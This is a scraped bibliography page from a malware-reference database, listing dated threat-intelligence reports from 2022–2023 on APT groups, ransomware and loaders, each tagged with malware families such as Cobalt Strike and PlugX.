Threat Hunter TeamCarderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong PlugX

Carderbee

×Select Content2023-08-18

TEAMT5

Still Hsu,

Zih-Cing LiaoUnmasking CamoFei: An In-depth Analysis of an Emerging APT Group Focused on Healthcare Sectors in East Asia CatB

Cobalt Strike

DoorMe

GIMMICK

×Select Content2023-08-18

d01a

Mohamed AdelUnderstanding Syscalls: Direct, Indirect, and Cobalt Strike Implementation Cobalt Strike

×Select Content2023-08-17

SentinelOne

Aleksandar Milenkoski,

Tom HegelChinese Entanglement | DLL Hijacking in the Asian Gambling Sector Cobalt Strike

HUI Loader

BRONZE STARLIGHT

×Select Content2023-08-07

Recorded Future

Insikt GroupRedHotel: A Prolific, Chinese State-Sponsored Group Operating at a Global Scale Winnti

Brute Ratel C4

Cobalt Strike

FunnySwitch

PlugX

ShadowPad

Spyder

Earth Lusca

×Select Content2023-07-29

Google

Google Cybersecurity Action TeamThreat Horizons August 2023 Threat Horizons Report SharkBot

Cobalt Strike

×Select Content2023-07-19

Lookout

Justin Albrecht,

Kristina BalaamLookout Attributes Advanced Android Surveillanceware to Chinese Espionage Group APT41 DragonEgg

WyrmSpy

×Select Content2023-07-14

Trend Micro

Daniel LunghiPossible Supply-Chain Attack Targeting Pakistani Government Delivers Shadowpad ShadowPad

DriftingCloud

Tonto Team

×Select Content2023-07-11

Spamhaus

Spamhaus Malware LabsSpamhaus Botnet Threat Update Q2 2023 Hydra

AsyncRAT

Aurora Stealer

Ave Maria

BumbleBee

Cobalt Strike

DCRat

Havoc

IcedID

ISFB

NjRAT

QakBot

Quasar RAT

RecordBreaker

RedLine Stealer

Remcos

Rhadamanthys

Sliver

Tofsee

×Select Content2023-07-11

Mandiant

Ng Choon Kiat,

Rommel JovenThe Spies Who Loved You: Infected USB Drives to Steal Secrets PlugX

×Select Content2023-07-07

Lab52

Lab52Beyond appearances: unknown actor using APT29’s TTP against Chinese users Cobalt Strike

×Select Content2023-07-03

Check Point Research

Checkpoint ResearchChinese Threat Actors Targeting Europe in SmugX Campaign PlugX

SmugX

×Select Content2023-06-30

K7 Security

DhanushCobalt Strike’s Deployment with Hardware Breakpoint for AMSI Bypass Cobalt Strike

×Select Content2023-06-16

Palo Alto Networks: Cortex Threat Research

Lior RochbergerThrough the Cortex XDR Lens: Uncovering a New Activity Group Targeting Governments in the Middle East and Africa CHINACHOPPER

Ladon

Yasso

CL-STA-0043

×Select Content2023-06-15

eSentire

RussianPandaeSentire Threat Intelligence Malware Analysis: Resident Campaign Cobalt Strike

Rhadamanthys

×Select Content2023-06-08

Twitter (@embee_research)

Embee_researchPractical Queries for Identifying Malware Infrastructure: An informal page for storing Censys/Shodan queries Amadey

AsyncRAT

Cobalt Strike

QakBot

Quasar RAT

Sliver

solarmarker

×Select Content2023-06-08

VMRay

Patrick StaubmannBusy Bees - The Transformation of BumbleBee BumbleBee

Cobalt Strike

Conti

Meterpreter

Sliver

×Select Content2023-05-15

Symantec

Threat Hunter TeamLancefly: Group Uses Custom Backdoor to Target Orgs in Government, Aviation, Other Sectors Merdoor

PlugX

ShadowPad

ZXShell

Lancefly

×Select Content2023-05-11

cocomelonc

cocomeloncMalware development trick - part 28: Dump lsass.exe. Simple C++ example. Cobalt Strike

APT3 Keylogger

×Select Content2023-05-03

Lab52

Lab52New Mustang Panda’s campaing against Australia PlugX

×Select Content2023-04-20

Github (dodo-sec)

dodo-secAn analysis of syscall usage in Cobalt Strike Beacons Cobalt Strike

×Select Content2023-04-20

Secureworks

Counter Threat Unit ResearchTeamBumblebee Malware Distributed Via Trojanized Installer Downloads BumbleBee

Cobalt Strike

×Select Content2023-04-18

Mandiant

MandiantM-Trends 2023 QUIETEXIT

AppleJeus

Black Basta

BlackCat

CaddyWiper

Cobalt Strike

Dharma

HermeticWiper

Hive

INDUSTROYER2

Ladon

LockBit

Meterpreter

PartyTicket

PlugX

QakBot

REvil

Royal Ransom

SystemBC

WhisperGate

×Select Content2023-04-12

Spamhaus

Spamhaus Malware LabsSpamhaus Botnet Threat Update Q1 2023 FluBot

Amadey

AsyncRAT

Aurora

Ave Maria

BumbleBee

Cobalt Strike

DCRat

Emotet

IcedID

ISFB

NjRAT

QakBot

RecordBreaker

RedLine Stealer

Remcos

Rhadamanthys

Sliver

Tofsee

Vidar

×Select Content2023-04-03

The DFIR Report

The DFIR ReportMalicious ISO File Leads to Domain Wide Ransomware Cobalt Strike

IcedID

Mount Locker

×Select Content2023-03-30

United States District Court (Eastern District of New York)

Fortra,

HEALTH-ISAC,

MicrosoftCracked Cobalt Strike (1:23-cv-02447) Black Basta

BlackCat

LockBit

RagnarLocker

LockBit

Black Basta

BlackCat

Cobalt Strike

Cuba

Emotet

LockBit

Mount Locker

PLAY

QakBot

RagnarLocker

Royal Ransom

Zloader

×Select Content2023-03-30

Recorded Future

Insikt GroupWith KEYPLUG, China’s RedGolf Spies On, Steals From Wide Field of Targets KEYPLUG

Cobalt Strike

PlugX

RedGolf

×Select Content2023-03-30

eSentire

eSentire Threat Response Unit (TRU)eSentire Threat Intelligence Malware Analysis: BatLoader BATLOADER

Cobalt Strike

ISFB

SystemBC

Vidar

×Select Content2023-03-28

ExaTrack

ExaTrackMélofée: a new alien malware in the Panda's toolset targeting Linux hosts HelloBot

Melofee

Winnti

Cobalt Strike

SparkRAT

STOWAWAY

×Select Content2023-03-27

Google

Google Cybersecurity Action TeamThreat Horizons: April 2023 Threat Horizons Report Gdrive

APT41

×Select Content2023-03-10

Medium walmartglobaltech

Jason Reaves,

Joshua PlattFrom Royal With Love Cobalt Strike

Conti

PLAY

Royal Ransom

Somnia

×Select Content2023-03-09

ASEC

SanseoPlugX Malware Being Distributed via Vulnerability Exploitation PlugX

×Select Content2023-03-09

Sophos

Gabor SzappanosA border-hopping PlugX USB worm takes its act on the road PlugX

×Select Content2023-03-01

Zscaler

Meghraj Nandanwar,

Shatak JainOneNote: A Growing Threat for Malware Distribution AsyncRAT

Cobalt Strike

IcedID

QakBot

RedLine Stealer

×Select Content2023-02-24

Trend Micro

Buddy Tancio,

Catherine Loveria,

Jed ValderamaInvestigating the PlugX Trojan Disguised as a Legitimate Windows Debugger Tool PlugX

×Select Content2023-02-23

Bitdefender

Bitdefender Team,

Martin ZugecTechnical Advisory: Various Threat Actors Targeting ManageEngine Exploit CVE-2022-47966 Cobalt Strike

DarkComet

QuiteRAT

RATel

×Select Content2023-02-22

Symantec

Symantec Threat Hunter TeamHydrochasma: Previously Unknown Group Targets Medical and Shipping Organizations in Asia Cobalt Strike

×Select Content2023-02-14

Cybereason

Cybereason Incident Response (IR) teamGootLoader - SEO Poisoning and Large Payloads Leading to Compromise GootLoader

Cobalt Strike

SystemBC

×Select Content2023-02-13

AhnLab

kingkimgimDalbit (m00nlight): Chinese Hacker Group’s APT Attack Campaign Godzilla Webshell

ASPXSpy

BlueShell

CHINACHOPPER

Cobalt Strike

Ladon

MimiKatz

Dalbit

×Select Content2023-02-13

Kroll

Laurie Iacono,

Stephen GreenRoyal Ransomware Deep Dive Cobalt Strike

Royal Ransom

×Select Content2023-02-08

Trend Micro

Ted LeeEarth Zhulong: Familiar Patterns Target Southeast Asian Firms Cobalt Strike

MACAMAX

1937CN

×Select Content2023-02-03

Mandiant

Genevieve Stark,

Kimberly GoodyFloat Like a Butterfly Sting Like a Bee BazarBackdoor

BumbleBee

Cobalt Strike

×Select Content2023-02-02

Kroll

Elio Biasiotto,

Stephen GreenHive Ransomware Technical Analysis and Initial Access Discovery BATLOADER

Cobalt Strike

Hive

×Select Content2023-02-02

Elastic

Andrew Pease,

Cyril François,

Devon Kerr,

Remco Sprooten,

Salim Bitam,

Seth GoodwinUpdate to the REF2924 intrusion set and related campaigns DoorMe

ShadowPad

SiestaGraph

×Select Content2023-02-02

EclecticIQ

EclecticIQ Threat Research TeamMustang Panda APT Group Uses European Commission-Themed Lure to Deliver PlugX Malware PlugX

×Select Content2023-01-30

Checkpoint

Arie OlshteinFollowing the Scent of TrickGate: 6-Year-Old Packer Used to Deploy the Most Wanted Malware Agent Tesla

Azorult

Buer

Cerber

Cobalt Strike

Emotet

Formbook

HawkEye Keylogger

Loki Password Stealer (PWS)

Maze

NetWire RC

Remcos

REvil

TrickBot

×Select Content2023-01-26

TEAMT5

Still HsuBrief History of MustangPanda and its PlugX Evolution PlugX

×Select Content2023-01-26

Palo Alto Networks Unit 42

Jen Miller-Osborn,

Mike HarbisonChinese PlugX Malware Hidden in Your USB Devices? PlugX

×Select Content2023-01-24

Fortinet

Geri RevayThe Year of the Wiper Azov Wiper

Bruh Wiper

CaddyWiper

Cobalt Strike

Vidar

×Select Content2023-01-23

Kroll

Elio Biasiotto,

Stephen GreenBlack Basta – Technical Analysis Black Basta

Cobalt Strike

MimiKatz

QakBot

SystemBC

×Select Content2023-01-16

Intrinsec

IntrinsecProxyNotShell – OWASSRF – Merry Xchange Cobalt Strike

SystemBC

×Select Content2023-01-09

kienmanowar Blog

m4n0w4r,

Tran Trung Kien[QuickNote] Another nice PlugX sample PlugX

×Select Content2023-01-05

Symantec

Threat Hunter TeamBluebottle: Campaign Hits Banks in French-speaking Countries in Africa CloudEyE

Cobalt Strike

MimiKatz

NetWire RC

POORTRY

Quasar RAT

BlueBottle

×Select Content2022-12-27

kienmanowar Blog

m4n0w4r,

Tran Trung KienDiving into a PlugX sample of Mustang Panda group PlugX

×Select Content2022-12-22

Recorded Future

Insikt GroupRedDelta Targets European Government Organizations and Continues to Iterate Custom PlugX Variant PlugX

RedDelta

×Select Content2022-12-15

Mandiant

MandiantTrojanized Windows 10 Operating System Installers Targeted Ukrainian Government Cobalt Strike

STOWAWAY

×Select Content2022-12-08

Cisco Talos

Tiago PereiraBreaking the silence - Recent Truebot activity Clop

Cobalt Strike

FlawedGrace

Raspberry Robin

Silence

Teleport

×Select Content2022-12-06

EuRepoC

Camille Borrett,

Kerstin Zettl-Schabath,

Lena RottingerConti/Wizard Spider BazarBackdoor

Cobalt Strike

Conti

Emotet

IcedID

Ryuk

TrickBot

WIZARD SPIDER

×Select Content2022-12-06

Blackberry

BlackBerry Research & Intelligence TeamMustang Panda Uses the Russian-Ukrainian War to Attack Europe and Asia Pacific Targets PlugX

×Select Content2022-12-02

Palo Alto Networks Unit 42

Bob Jung,

Dominik Reichel,

Esmid IdrizovicBlowing Cobalt Strike Out of the Water With Memory Analysis Cobalt Strike

×Select Content2022-12-02

Avast Decoded

Threat Intelligence TeamHitching a ride with Mustang Panda PlugX

×Select Content2022-11-30

FFRI Security

MatsumotoEvolution of the PlugX loader PlugX

Poison Ivy

×Select Content2022-11-15

SOC Prime

Veronika TelychkoSomnia Malware Detection: UAC-0118 aka FRwL Launches Cyber Attacks Against Organizations in Ukraine Using Enhanced Malware Strains Cobalt Strike

Vidar

UAC-0118

×Select Content2022-11-09

Trend Micro

Hara Hiroaki,

Ted LeeHack the Real Box: APT41’s New Subgroup Earth Longzhi Cobalt Strike

MimiKatz

Earth Longzhi

×Select Content2022-11-03

paloalto Netoworks: Unit42

Chris Navarrete,

Durgesh Sangvikar,

Matthew Tennis,

Siddhart Shibiraj,

Yanhui Jia,

Yu FuCobalt Strike Analysis and Tutorial: Identifying Beacon Team Servers in the Wild Cobalt Strike

×Select Content2022-11-03

Group-IB

Rustam MirkasymovFinancially motivated, dangerously activated: OPERA1ER APT in Africa Cobalt Strike

Common Raven

×Select Content2022-11-03

Github (chronicle)

ChronicleGCTI Open Source Detection Signatures Cobalt Strike

Sliver

×Select Content2022-10-31

Cynet

Max MalyutinOrion Threat Alert: Qakbot TTPs Arsenal and the Black Basta Ransomware Black Basta

Cobalt Strike

QakBot

×Select Content2022-10-25

VMware Threat Analysis Unit

Takahiro HaruyamaTracking the entire iceberg: long-term APT malware C2 protocol emulation and scanning ShadowPad

Winnti

×Select Content2022-10-13

Spamhaus

Spamhaus Malware LabsSpamhaus Botnet Threat Update Q3 2022 FluBot

Arkei Stealer

AsyncRAT

Ave Maria

BumbleBee

Cobalt Strike

DCRat

Dridex

Emotet

Loki Password Stealer (PWS)

Nanocore RAT

NetWire RC

NjRAT

QakBot

RecordBreaker

RedLine Stealer

Remcos

Socelars

Tofsee

Vjw0rm

×Select Content2022-10-13

Microsoft

Microsoft Threat Hunting,

MSRC TeamHunting for Cobalt Strike: Mining and plotting for fun and profit Cobalt Strike

×Select Content2022-10-12

Trend Micro

Ian Kenefick,

Lucas Silva,

Nicole HernandezBlack Basta Ransomware Gang Infiltrates Networks via QAKBOT, Brute Ratel, and Cobalt Strike Black Basta

Brute Ratel C4

Cobalt Strike

QakBot

×Select Content2022-10-06

Blackberry

The BlackBerry Research & Intelligence TeamMustang Panda Abuses Legitimate Apps to Target Myanmar Based Victims PlugX

×Select Content2022-10-03

Check Point

Marc Salinas FernandezBumblebee: increasing its capacity and evolving its TTPs BumbleBee

Cobalt Strike

Meterpreter

Sliver

Vidar

×Select Content2022-10-03

Trend Micro

Jaromír Hořejší,

Joseph ChenWater Labbu Abuses Malicious DApps to Steal Cryptocurrency Cobalt Strike

Water Labbu

×Select Content2022-09-30

NCC Group

Michael Mullen,

Nikolaos Pantazopoulos,

William BackhouseA glimpse into the shadowy realm of a Chinese APT: detailed analysis of a ShadowPad intrusion ShadowPad

×Select Content2022-09-29

Symantec

Threat Hunter TeamWitchetty: Group Uses Updated Toolset in Attacks on Governments in Middle East CHINACHOPPER

Lookback

MimiKatz

PlugX

Unidentified 096 (Keylogger)

x4

Witchetty

×Select Content2022-09-26

Palo Alto Networks Unit 42

Daniela Shalev,

Itay GamlielHunting for Unsigned DLLs to Find APTs PlugX

Raspberry Robin

Roshtyak

×Select Content2022-09-26

The DFIR Report

The DFIR ReportBumbleBee: Round Two BumbleBee

Cobalt Strike

Meterpreter

×Select Content2022-09-25

YouTube (Arda Büyükkaya)

Arda BüyükkayaCobalt Strike Shellcode Loader With Rust (YouTube) Cobalt Strike

×Select Content2022-09-19

Virus Bulletin

Takahiro HaruyamaTracking the entire iceberg - long-term APT malware C2 protocol emulation and scanning ShadowPad

Winnti

×Select Content2022-09-14

Security Joes

Felipe DuarteDissecting PlugX to Extract Its Crown Jewels PlugX

×Select Content2022-09-13

Symantec

Threat Hunter TeamNew Wave of Espionage Activity Targets Asian Governments MimiKatz

PlugX

Quasar RAT

ShadowPad

Trochilus RAT

×Select Content2022-09-13

AdvIntel

Advanced IntelligenceAdvIntel's State of Emotet aka "SpmTools" Displays Over Million Compromised Machines Through 2022 Conti

Cobalt Strike

Emotet

Ryuk

TrickBot

×Select Content2022-09-12

The DFIR Report

The DFIR ReportDead or Alive? An Emotet Story Cobalt Strike

Emotet

×Select Content2022-09-09

Github (m4now4r)

m4n0w4r“Mustang Panda” – Enemy at the gate PlugX

×Select Content2022-09-08

Secureworks

Counter Threat Unit ResearchTeamBRONZE PRESIDENT Targets Government Officials PlugX

×Select Content2022-09-08

Cybereason

Aleksandar Milenkoski,

Kotaro Ogino,

Yuki ShibuyaThreat Analysis Report: PlugX RAT Loader Evolution PlugX

×Select Content2022-09-07

Google

Google Threat Analysis Group,

Pierre-Marc BureauInitial access broker repurposing techniques in targeted attacks against Ukraine AnchorMail

Cobalt Strike

IcedID

×Select Content2022-09-07

cyble

CybleBumblebee Returns With New Infection Technique BumbleBee

Cobalt Strike

×Select Content2022-09-06

ESET Research

Thibaut PassillyWorok: The big picture MimiKatz

PNGLoad

reGeorg

ShadowPad

Worok

×Select Content2022-09-06

INCIBE-CERT

INCIBEEstudio del análisis de Nobelium BEATDROP

BOOMBOX

Cobalt Strike

EnvyScout

Unidentified 099 (APT29 Dropbox Loader)

VaporRage

×Select Content2022-09-06

CISA

CISA,

FBI,

MS-ISAC,

US-CERTAlert (AA22-249A) #StopRansomware: Vice Society Cobalt Strike

Empire Downloader

FiveHands

HelloKitty

SystemBC

Zeppelin

×Select Content2022-09-06

Didier Stevens

Didier StevensAn Obfuscated Beacon – Extra XOR Layer Cobalt Strike

×Select Content2022-09-06

cocomelonc

cocomeloncMalware development tricks: parent PID spoofing. Simple C++ example. Cobalt Strike

Konni

×Select Content2022-09-01

Medium michaelkoczwara

Michael KoczwaraHunting C2/Adversaries Infrastructure with Shodan and Censys Brute Ratel C4

Cobalt Strike

Deimos

GRUNT

IcedID

Merlin

Meterpreter

Nighthawk

PoshC2

Sliver

×Select Content2022-09-01

Trend Micro

Trend MicroRansomware Spotlight Black Basta Black Basta

Cobalt Strike

MimiKatz

QakBot

×Select Content2022-08-30

eSentire

eSentire Threat Response Unit (TRU)Hacker Infrastructure Used in Cisco Breach Discovered Attacking a Top Workforce Management Corporation & an Affiliate of Russia’s Evil Corp Gang Suspected, Reports eSentire Cobalt Strike

FiveHands

UNC2447

×Select Content2022-08-25

SentinelOne

Jim WalterBlueSky Ransomware | AD Lateral Movement, Evasion and Fast Encryption Put Threat on the Radar BlueSky

Cobalt Strike

JuicyPotato

×Select Content2022-08-22

Microsoft

MicrosoftExtortion Economics - Ransomware’s new business model BlackCat

Conti

Hive

REvil

AgendaCrypt

Black Basta

BlackCat

Brute Ratel C4

Cobalt Strike

Conti

Hive

Mount Locker

Nokoyawa Ransomware

REvil

Ryuk

×Select Content2022-08-19

nccgroup

Ross InmanBack in Black: Unlocking a LockBit 3.0 Ransomware Attack FAKEUPDATES

Cobalt Strike

LockBit

×Select Content2022-08-18

NSFOCUS

NSFOCUSNew APT group MURENSHARK investigative report: Torpedoes hit Turkish Navy Cobalt Strike

×Select Content2022-08-18

Group-IB

Nikita RostovtsevAPT41 World Tour 2021 on a tight schedule Cobalt Strike

×Select Content2022-08-18

Sophos

Sean GallagherCookie stealing: the new perimeter bypass Cobalt Strike

Meterpreter

MimiKatz

Phoenix Keylogger

Quasar RAT

×Select Content2022-08-18

Trustwave

Pawel KnapczykOverview of the Cyber Weapons Used in the Ukraine - Russia War AcidRain

CaddyWiper

Cobalt Strike

CredoMap

DCRat

DoubleZero

GraphSteel

GrimPlant

HermeticWiper

INDUSTROYER2

InvisiMole

IsaacWiper

PartyTicket

×Select Content2022-08-18

Trustwave

Pawel KnapczykOverview of the Cyber Weapons Used in the Ukraine - Russia War AcidRain

CaddyWiper

Cobalt Strike

CredoMap

DCRat

DoubleZero

GraphSteel

GrimPlant

HermeticWiper

INDUSTROYER2

InvisiMole

IsaacWiper

PartyTicket

×Select Content2022-08-17

Cybereason

Cybereason Global SOC TeamBumblebee Loader – The High Road to Enterprise Domain Control BumbleBee

Cobalt Strike

×Select Content2022-08-17

Secureworks

Counter Threat Unit ResearchTeamDarkTortilla Malware Analysis Agent Tesla

AsyncRAT

Cobalt Strike

DarkTortilla

Nanocore RAT

RedLine Stealer

×Select Content2022-08-12

SANS ISC

Brad DuncanMonster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC and Cobalt Strike Cobalt Strike

DarkVNC

IcedID

×Select Content2022-08-11

Malcat

malcat teamLNK forensic and config extraction of a cobalt strike beacon Cobalt Strike

×Select Content2022-08-11

SecurityScorecard

Robert AmesThe Increase in Ransomware Attacks on Local Governments BlackCat

BlackCat

Cobalt Strike

LockBit

×Select Content2022-08-10

Weixin

Red Raindrop TeamOperation(верность) mercenary: a torrent of steel trapped in the plains of Eastern Europe BumbleBee

Cobalt Strike

×Select Content2022-08-08

The DFIR Report

The DFIR ReportBumbleBee Roasts Its Way to Domain Admin BumbleBee

Cobalt Strike

×Select Content2022-08-04

YouTube (Arda Büyükkaya)

Arda BüyükkayaLockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool Cobalt Strike

LockBit

×Select Content2022-08-03

Palo Alto Networks Unit 42

Brad DuncanFlight of the Bumblebee: Email Lures and File Sharing Services Lead to Malware BazarBackdoor

BumbleBee

Cobalt Strike

Conti

×Select Content2022-08-02

Cisco Talos

Asheer Malhotra,

Vitor VenturaManjusaka: A Chinese sibling of Sliver and Cobalt Strike Manjusaka

Cobalt Strike

Manjusaka

×Select Content2022-07-30

cocomeloncMalware AV evasion - part 8. Encode payload via Z85 Agent Tesla

Carbanak

Carberp

Cardinal RAT

Cobalt Strike

donut_injector

×Select Content2022-07-28

SentinelOne

James Haughom,

Julien Reisdorffer,

Júlio DantasLiving Off Windows Defender | LockBit Ransomware Sideloads Cobalt Strike Through Microsoft Security Tool Cobalt Strike

LockBit

×Select Content2022-07-27

ReversingLabs

Joseph EdwardsThreat analysis: Follina exploit fuels 'live-off-the-land' attacks Cobalt Strike

MimiKatz

×Select Content2022-07-27

cyble

Cyble Research LabsTargeted Attacks Being Carried Out Via DLL SideLoading Cobalt Strike

QakBot

×Select Content2022-07-27

Trend Micro

Buddy Tancio,

Jed ValderamaGootkit Loader’s Updated Tactics and Fileless Delivery of Cobalt Strike Cobalt Strike

GootKit

Kronos

REvil

SunCrypt

×Select Content2022-07-26

Microsoft

Microsoft 365 Defender Research TeamMalicious IIS extensions quietly open persistent backdoors into servers CHINACHOPPER

MimiKatz

×Select Content2022-07-22

Binary Ninja

Xusheng LiReverse Engineering a Cobalt Strike Dropper With Binary Ninja Cobalt Strike

×Select Content2022-07-20

NVISO Labs

Sasja ReynaertAnalysis of a trojanized jQuery script: GootLoader unleashed GootLoader

Cobalt Strike

×Select Content2022-07-20

U.S. Cyber Command

Cyber National Mission Force Public AffairsCyber National Mission Force discloses IOCs from Ukrainian networks Cobalt Strike

GraphSteel

GrimPlant

MicroBackdoor

×Select Content2022-07-20

Advanced Intelligence

Marley Smith,

Vitali Kremez,

Yelisey BoguslavskiyAnatomy of Attack: Truth Behind the Costa Rica Government Ransomware 5-Day Intrusion Cobalt Strike

×Select Content2022-07-20

Mandiant

Mandiant Threat IntelligenceEvacuation and Humanitarian Documents used to Spear Phish Ukrainian Entities Cobalt Strike

GraphSteel

GrimPlant

MicroBackdoor

×Select Content2022-07-19

Palo Alto Networks Unit 42

Mike Harbison,

Peter RenalsRussian APT29 Hackers Use Online Storage Services, DropBox and Google Drive Cobalt Strike

EnvyScout

Gdrive

×Select Content2022-07-18

Palo Alto Networks Unit 42

Unit 42Obscure Serpens Cobalt Strike

Empire Downloader

Meterpreter

MimiKatz

DarkHydrus

×Select Content2022-07-18

YouTube (Security Joes)

Felipe DuartePlugX DLL Side-Loading Technique PlugX

×Select Content2022-07-18

Palo Alto Networks Unit 42

Unit 42Shallow Taurus FormerFirstRAT

IsSpace

NewCT

PlugX

Poison Ivy

Tidepool

DragonOK

×Select Content2022-07-18

Censys

CensysRussian Ransomware C2 Network Discovered in Censys Data Cobalt Strike

DeimosC2

MimiKatz

PoshC2

×Select Content2022-07-18

Palo Alto Networks Unit 42

Unit 42Iron Taurus CHINACHOPPER

Ghost RAT

Wonknu

ZXShell

APT27

×Select Content2022-07-13

Malwarebytes Labs

Hossein Jazi,

Roberto SantosCobalt Strikes again: UAC-0056 continues to target Ukraine in its latest campaign Cobalt Strike

×Select Content2022-07-13

Palo Alto Networks Unit 42

Chris Navarrete,

Durgesh Sangvikar,

Siddhart Shibiraj,

Yanhui Jia,

Yu FuCobalt Strike Analysis and Tutorial: CS Metadata Encryption and Decryption Cobalt Strike

×Select Content2022-07-11

Cert-UA

Cert-UAUAC-0056 attack on Ukrainian state organizations using Cobalt Strike Beacon (CERT-UA#4941) Cobalt Strike

×Select Content2022-07-07

SANS ISC

Brad DuncanEmotet infection with Cobalt Strike Cobalt Strike

Emotet

×Select Content2022-07-07

IBM

Charlotte Hammond,

Kat Weinberger,

Ole VilladsenUnprecedented Shift: The Trickbot Group is Systematically Attacking Ukraine AnchorMail

BumbleBee

Cobalt Strike

IcedID

Meterpreter

×Select Content2022-07-06

Cert-UA

Cert-UAUAC-0056 cyberattack on Ukrainian state organizations using Cobalt Strike Beacon (CERT-UA#4914) Cobalt Strike

×Select Content2022-07-01

RiskIQ

RiskIQToddyCat: A Guided Journey through the Attacker's Infrastructure ShadowPad

ToddyCat

×Select Content2022-06-30

Trend Micro

Emmanuel Panopio,

James Panlilio,

John Kenneth Reyes,

Kenneth Adrian Apostol,

Melvin Singwa,

Mirah Manlapig,

Paolo Ronniel LabradorBlack Basta Ransomware Operators Expand Their Attack Arsenal With QakBot Trojan and PrintNightmare Exploit Black Basta

Cobalt Strike

QakBot

×Select Content2022-06-28

Lumen

Black Lotus LabsZuoRAT Hijacks SOHO Routers To Silently Stalk Networks ZuoRAT

Cobalt Strike

×Select Content2022-06-27

Kaspersky ICS CERT

Artem Snegirev,

Kirill KruglovAttacks on industrial control systems using ShadowPad Cobalt Strike

PlugX

ShadowPad

×Select Content2022-06-26

BushidoTokenOverview of Russian GRU and SVR Cyberespionage Campaigns 1H 2022 Cobalt Strike

CredoMap

EnvyScout

×Select Content2022-06-23

cyble

Cyble Research LabsMatanbuchus Loader Resurfaces Cobalt Strike

Matanbuchus

×Select Content2022-06-23

Secureworks

Counter Threat Unit ResearchTeamBRONZE STARLIGHT Ransomware Operations Use HUI Loader ATOMSILO

Cobalt Strike

HUI Loader

LockFile

NightSky

Pandora

PlugX

Quasar RAT

Rook

SodaMaster

BRONZE STARLIGHT

×Select Content2022-06-21

Cisco Talos

Chris Neal,

Flavio Costa,

Guilherme VenereAvos ransomware group expands with new attack arsenal AvosLocker

Cobalt Strike

DarkComet

MimiKatz

×Select Content2022-06-20

Cert-UA

Cert-UAUAC-0098 group cyberattack on critical infrastructure of Ukraine (CERT-UA#4842) Cobalt Strike

×Select Content2022-06-17

SANS ISC

Brad DuncanMalspam pushes Matanbuchus malware, leads to Cobalt Strike Cobalt Strike

Matanbuchus

×Select Content2022-06-15

Security Joes

Charles Lomboni,

Felipe Duarte,

Venkat RajgorBackdoor via XFF: Mysterious Threat Actor Under Radar CHINACHOPPER

×Select Content2022-06-11

Twitter (@MsftSecIntel)

Microsoft Threat IntelligenceTweet on DEV-0401, DEV-0234 exploiting Confluence RCE CVE-2022-26134 Kinsing

Mirai

Cobalt Strike

×Select Content2022-06-07

AdvIntel

Marley Smith,

Vitali Kremez,

Yelisey BoguslavskiyBlackCat — In a Shifting Threat Landscape, It Helps to Land on Your Feet: Tech Dive BlackCat

BlackCat

Cobalt Strike

×Select Content2022-06-07

cyble

CybleBumblebee Loader on The Rise BumbleBee

Cobalt Strike

×Select Content2022-06-06

Trellix

TrelixGrowling Bears Make Thunderous Noise Cobalt Strike

HermeticWiper

WhisperGate

NB65

×Select Content2022-06-04

kienmanowar Blog

m4n0w4r,

Tran Trung Kien[QuickNote] CobaltStrike SMB Beacon Analysis Cobalt Strike

×Select Content2022-06-03

AttackIQ

AttackIQ Adversary Research Team,

Jackson WellsAttack Graph Response to US CERT AA22-152A: Karakurt Data Extortion Group Cobalt Strike

MimiKatz

×Select Content2022-06-02

Mandiant

MandiantTRENDING EVIL Q2 2022 CloudEyE

Cobalt Strike

CryptBot

Emotet

IsaacWiper

QakBot

×Select Content2022-06-02

Mandiant

Mandiant IntelligenceTo HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions FAKEUPDATES

Blister

Cobalt Strike

DoppelPaymer

Dridex

FriedEx

Hades

LockBit

Macaw

MimiKatz

Phoenix Locker

WastedLocker

×Select Content2022-06-01

Elastic

Andrew Pease,

Daniel Stepanic,

Derek Ditch,

Salim Bitam,

Seth GoodwinCUBA Ransomware Campaign Analysis Cobalt Strike

Cuba

Meterpreter

MimiKatz

SystemBC

×Select Content2022-05-27

PTSecurity

Aleksey Vishnyakov,

Anton BelousovHow bootkits are implemented in modern firmware and how UEFI differs from Legacy BIOS LoJax

MoonBounce

×Select Content2022-05-25

Medium walmartglobaltech

Jason Reaves,

Joshua PlattSocGholish Campaigns and Initial Access Kit FAKEUPDATES

Blister

Cobalt Strike

NetSupportManager RAT

×Select Content2022-05-24

BitSight

BitSight,

João Batista,

Pedro UmbelinoEmotet Botnet Rises Again Cobalt Strike

Emotet

QakBot

SystemBC

×Select Content2022-05-24

The Hacker News

Florian GoutinMalware Analysis: Trickbot Cobalt Strike

Conti

Ryuk

TrickBot

×Select Content2022-05-23

Trend Micro

Daniel Lunghi,

Jaromír HořejšíOperation Earth Berberoka reptile

oRAT

Ghost RAT

PlugX

pupy

Earth Berberoka

×Select Content2022-05-22

R136a1

Dominik ReichelIntroduction of a PE file extractor for various situations Cobalt Strike

Matanbuchus

×Select Content2022-05-20

sonatype

Ax SharmaNew 'pymafka' malicious package drops Cobalt Strike on macOS, Windows, Linux Cobalt Strike

×Select Content2022-05-20

VinCSS

Dang Dinh Phuong,

m4n0w4r,

Tran Trung Kien[RE027] China-based APT Mustang Panda might have still continued their attack activities against organizations in Vietnam PlugX

×Select Content2022-05-20

Cybleinc

CybleMalware Campaign Targets InfoSec Community: Threat Actor Uses Fake Proof Of Concept To Deliver Cobalt-Strike Beacon Cobalt Strike

×Select Content2022-05-20

AhnLab

ASECWhy Remediation Alone Is Not Enough When Infected by Malware Cobalt Strike

DarkSide

×Select Content2022-05-19

InfoSec Handlers Diary Blog

Brad DuncanBumblebee Malware from TransferXL URLs BumbleBee

Cobalt Strike

×Select Content2022-05-19

InfoSec Handlers Diary Blog

Brad DuncanBumblebee Malware from TransferXL URLs BumbleBee

Cobalt Strike

×Select Content2022-05-18

PRODAFT Threat Intelligence

PRODAFTWizard Spider In-Depth Analysis Cobalt Strike

Conti

WIZARD SPIDER

×Select Content2022-05-17

Trend Micro

Trend Micro ResearchRansomware Spotlight: RansomEXX LaZagne

Cobalt Strike

IcedID

MimiKatz

PyXie

RansomEXX

TrickBot

×Select Content2022-05-17

Positive Technologies

Positive TechnologiesSpace Pirates: analyzing the tools and connections of a new hacker group FormerFirstRAT

PlugX

Poison Ivy

Rovnix

ShadowPad

Zupdax

×Select Content2022-05-16

JPCERT/CC

Shusei TomonagaAnalysis of HUI Loader HUI Loader

PlugX

Poison Ivy

